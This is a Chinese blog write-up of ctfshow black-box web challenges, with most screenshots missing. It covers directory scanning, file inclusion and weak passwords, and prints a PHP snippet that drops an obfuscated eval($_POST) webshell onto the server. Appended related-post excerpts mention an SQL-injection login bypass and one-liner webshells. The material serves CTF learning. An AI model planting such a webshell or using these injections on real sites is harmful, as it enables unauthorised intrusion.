ctfshow_黑盒测试

最新推荐文章于 2023-01-28 01:14:59 发布
最新推荐文章于 2023-01-28 01:14:59 发布
阅读量470 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/115220637
版权

文章目录

WEB381

payload
后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。
page.php?id=flag

WEB39

在这里插入图片描述
这里爆出了路径,直接访问获取flag。

web40

这里和上一题一样,但是多了一个弱密码.
在这里插入图片描述

web41

web 388

扫描目录发现这里有个debug,这里盲猜是file传参数,尝试包含一下包含一下文件
在这里插入图片描述

接着在扫描目录得地方还找到了alsckdfy/editor/
在这里插入图片描述

这里上传成功之后会有路径,这里最好上传一句话免杀马
在这里插入图片描述

<?php
$a = '<?ph'.'p ev'.'al($_PO'.'ST[1]);?>';
file_put_contents('/var/www/html/1.php',$a);
?>

然后执行一句话木马
在这里插入图片描述
接着访问1.php
在这里插入图片描述
直接tac
在这里插入图片描述

multi4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow__测试
qq_45655564的博客
07-04 401
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
bbob.v3.6.rar_测试
09-20
**测试(Black Box Testing)** 测试是一种软件测试方法,主要关注软件功能的表现,而不考虑其内部结构或工作原理。在这种测试方法中,测试人员扮演最终用户的角色,只根据软件的需求规格说明书来验证软件...
php测试,CTFSHOW测试
weixin_42573113的博客
03-28 365
文章目录web380payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagweb381payload地址在源码里面web382、383还是上面的地址,万能密码登录得到flagweb384字典生成import strings1=string.ascii_lowercases2=string.digitsf=open('dict...
CTFshow——测试
D.MIND 的博客
08-14 634
文章目录380381382、383384385386387388389390391、392393394、395 380 扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可 381 在首页源码中有可疑的路径,一层层打开看就发现flag了 382、383 两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入 最后还是弱密码爆破一下,账密是admin:admin888
ctfshow测试
qq_61768489的博客
01-28 598
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
CTFshow 测试
starttv的博客
12-03 572
简单的看了一下,没有发现可以交互的地方,先扫描一下目录吧 扫描出两个目录flag.php和page.php。先访问flag.php为空,查看源代码为空。访问page.php,出现报错,应该需要传一个id参数,访问对应的php文件。 Payload:右键查看源代码即可获得flag web381-源码找后台 界面跟上题差不多,先扫目录,还是page.php,不过没扫出来flag.php,上题的思路行不通。检查源代码发现一个奇怪的目录,alsckdfy,访问试试,得到flag。 web382-sql注入 按照上题
black-box-white-box-testing.zip_white _测试
09-23
在软件测试领域,测试和白盒测试是两种主要的测试方法,它们各自有着不同的关注点和适用场景。下面将详细阐述这两种测试方法的概念、特点、优缺点以及如何结合使用。 **测试(Black Box Testing)** 盒...
第3次实验报告(测试判定表测试法)20200527_软件测试_测试实验_
09-29
本文将深入探讨在给定的“第3次实验报告(测试判定表测试法)20200527”中涉及的软件测试核心知识点,特别是测试与判定表测试法的应用。 首先,软件测试是一种系统性的过程,旨在发现并识别软件中的错误、...
软件测试ppt_软件测试学习资料_测试_白盒测试_
09-30
接下来,资料深入讲解了两种主要的测试方法:【测试】和【白盒测试】。 【测试】,也称为功能测试,是从用户的角度出发,关注软件的功能表现。测试者无需知道内部代码结构,只需根据需求文档来验证软件的...
【CTFSHOW】web入门 测试
7ruth0hn的博客
09-29 1268
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学测试吧 web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
ctfshow之测试380-395
qq_50589021的博客
09-15 761
前言 总结测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
ctfshow 测试web380-395 wp
m0_50936156的博客
04-22 383
目录web 380web 381web 381,382web 383-386web 387web 49web 50web 51web 52 记录下学习内容 web 380 开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp 有一个page.php页面 打开$id.php失败 猜到是file_get_contents,id传入page,出现关键部分 $html = file_get_contents('page_'.$id.'.php');
CTFSHOW测试
羽的博客
01-15 1849
文章目录web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址,万能密码登录得到flag web384 字典生成 import string s1=string.asci
ciscn_final_7(测试)
seaaseesa的博客
07-25 374
ciscn_final_7(测试) 首先检查一下程序的保护机制 然后,我们用IDA分析一下 程序比较复杂 比较难逆向,其大致原理是fork了子进程做为一个调试进程,然后主进程里通过int 3中断通知调试器设置相应的寄存器,从而执行到其他地方。 由于整个程序主逻辑全部使用中断来实现,比较难逆向,因此我们直接测试了。 首先通过枚举choice的选项,得到了一下选项 #110 add #120 edit #238 del #386 exit 然后就进行测试,发现d
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 515
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
ctfshow-菜狗杯-web(一)
qq_47804678的博客
11-30 2647
_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。于是我们用POST形式发包,
CTFshow刷题日记-WEB-测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3055
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
ctfshow测试
最新发布
09-29
测试是一种测试方法,它是在没有访问内部...根据引用的信息,我们可以得出结论:ctfshow测试是一种针对系统安全进行的渗透测试测试者试图绕过名单功能并执行一系列攻击操作,以测试系统的安全性和鲁棒性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值